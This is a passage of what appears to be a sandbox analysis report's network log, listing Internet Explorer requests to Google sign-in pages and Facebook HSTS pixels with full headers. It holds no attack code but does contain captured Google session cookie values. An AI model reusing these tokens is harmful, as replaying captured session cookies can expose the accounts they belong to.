                                                                                              content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: same-origin
                                                                                              cross-origin-opener-policy: unsafe-none
                                                                                              Pragma: no-cache
                                                                                              Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                              Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: DENY
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              Content-Type: text/html; charset="utf-8"
                                                                                              X-FB-Debug: PpVTlJrNgxsSE3tZ2BmzXDguFjCQX2k0/zCr5NSEpUyK7eyR8LIYzOwdkSOigYnX4akYYeQFYgD2exEqPeoJ2w==
                                                                                              Date: Tue, 24 Oct 2023 12:46:38 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/_/bscframe
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /_/bscframe HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S537742023%3A1698151599961579&theme=glif
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:WCWhIr3rOcQ6uTtwVD7d8aPJMQusxA:nRvdXWBhRgdt3H1E; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:41 GMT
                                                                                              Content-Security-Policy: script-src 'unsafe-eval';require-trusted-types-for 'script';object-src 'none'
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Report-To: {"group":"AccountsSignInSignUpUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInSignUpUi"}]}
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInSignUpUi"
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/generate_204?cWpgDQ
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /generate_204?cWpgDQ HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S537742023%3A1698151599961579&theme=glif
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:KfM4SNoPqw5ikn7DrOorQ0Vo0sVqhg:PFPgQ75YNVtveEOD; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 204 No Content
                                                                                              Content-Length: 0
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Date: Tue, 24 Oct 2023 12:46:42 GMT
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET / HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:yJva5d_91Rl18o8LS2Agto8vuXCPaA:_4T_em5OQdL1SBej; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Set-Cookie: __Host-GAPS=1:WCWhIr3rOcQ6uTtwVD7d8aPJMQusxA:nRvdXWBhRgdt3H1E;Path=/;Expires=Thu, 23-Oct-2025 12:46:39 GMT;Secure;HttpOnly;Priority=HIGH
                                                                                              X-Frame-Options: DENY
                                                                                              Content-Security-Policy: script-src 'nonce-duLUgCEf8J_fZUjM1O8RVQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                              Location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
                                                                                              Content-Encoding: gzip
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Expires: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Server: GSE
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:WCWhIr3rOcQ6uTtwVD7d8aPJMQusxA:nRvdXWBhRgdt3H1E; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxvlDIme0HGaL39d8oyJnRMU-ylnT27SQ6mtAYl6Vq9JJ6v8efWmoVOvtWw-lcgM9Q6Neweww
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8dkERtPxlEgw7sNVvA7aDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
                                                                                              Cross-Origin-Opener-Policy: unsafe-none
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxvlDIme0HGaL39d8oyJnRMU-ylnT27SQ6mtAYl6Vq9JJ6v8efWmoVOvtWw-lcgM9Q6Neweww
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxvlDIme0HGaL39d8oyJnRMU-ylnT27SQ6mtAYl6Vq9JJ6v8efWmoVOvtWw-lcgM9Q6Neweww HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:WCWhIr3rOcQ6uTtwVD7d8aPJMQusxA:nRvdXWBhRgdt3H1E; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: DENY
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S537742023%3A1698151599961579&theme=glif
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-_HVTeoHHI8aIkc2k9TPtDw' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                              Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                              Content-Encoding: gzip
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Server: GSE
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S537742023%3A1698151599961579&theme=glif
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S537742023%3A1698151599961579&theme=glif HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:WCWhIr3rOcQ6uTtwVD7d8aPJMQusxA:nRvdXWBhRgdt3H1E; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              X-Frame-Options: DENY
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
                                                                                              x-ua-compatible: IE=edge
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:40 GMT
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
                                                                                              Content-Security-Policy: script-src 'nonce-vIgw67Zi21fUgpJFWTZl-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/favicon.ico
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /favicon.ico HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:WCWhIr3rOcQ6uTtwVD7d8aPJMQusxA:nRvdXWBhRgdt3H1E; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: DENY
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:41 GMT
                                                                                              Location: https://www.google.com/favicon.ico
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                              Content-Security-Policy: script-src 'nonce-UpH95kHrWQ0ZUJbxvi38Ag' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                              Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                              Content-Encoding: gzip
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Server: GSE
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=5573330798703428993&bl=boq_identityfrontendauthuiserver_20231015.08_p1&hl=en-US&_reqid=46000&rt=c
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              POST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=5573330798703428993&bl=boq_identityfrontendauthuiserver_20231015.08_p1&hl=en-US&_reqid=46000&rt=c HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Same-Domain: 1
                                                                                              x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                                                              x-goog-ext-391502476-jspb: ["S537742023:1698151599961579",null,null,"AVQVeyxiRRf2ijaSzcd45w-m9Sx_VZuzvwcDEfHlvhPpizTQFZhidUgnVyn10bwkQ-2HdCSWR_QAug"]
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: accounts.google.com
                                                                                              Content-Length: 164
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: __Host-GAPS=1:WCWhIr3rOcQ6uTtwVD7d8aPJMQusxA:nRvdXWBhRgdt3H1E; OTZ=7264126_56_56__56_; NID=511=foioM9HcMJoZoxVMVu_5MKZMdAqxp62Fm-sMoirYsGy-G9tla4AzDFnT9Kv4KoOe1h5HTl91KxCGPTXagwnqwtpGa_rcGEwiC7wCyeRlFIVhQZwiBv6vTwCFHhD3wDXaRTPKNthUpnuGEVZCUFR0stwES4Z4Jo1M2YYF9BVdRGg
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: application/json; charset=utf-8
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              Set-Cookie: __Host-GAPS=1:KfM4SNoPqw5ikn7DrOorQ0Vo0sVqhg:PFPgQ75YNVtveEOD; Expires=Thu, 23-Oct-2025 12:46:41 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:41 GMT
                                                                                              Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
                                                                                              Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://facebook.com/security/hsts-pixel.gif?c=3.2
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.35:443
                                                                                              Request
                                                                                              GET /security/hsts-pixel.gif?c=3.2 HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: facebook.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Location: https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                                                              reporting-endpoints:
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Strict-Transport-Security: max-age=15552000; preload
                                                                                              Content-Type: text/html; charset="utf-8"
                                                                                              X-FB-Debug: 5eEMMLPiYUCflcfs26vS26mB75bhjR5Bq7U1yV4Adbz1GHKmDPjCRc8DOrpjFQA4s2xKd9NP6gsQX0AhjzOGAA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 0
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.35:443
                                                                                              Request
                                                                                              GET /security/hsts-pixel.gif?c=2 HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Connection: Keep-Alive
                                                                                              Host: fbcdn.net
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Location: https://fbsbx.com/security/hsts-pixel.gif
                                                                                              reporting-endpoints:
                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                                                              Content-Type: text/html; charset="utf-8"
                                                                                              X-FB-Debug: YlxK95CGzda2TD1+BR4IfCQdiQ4XpxYA2+HJ3fiX7rvK0rlt6609R3wC9PV0gjwkGUaNCUAYYKnbL5zkwQia4w==
                                                                                              Date: Tue, 24 Oct 2023 12:46:39 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 0
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://fbsbx.com/security/hsts-pixel.gif
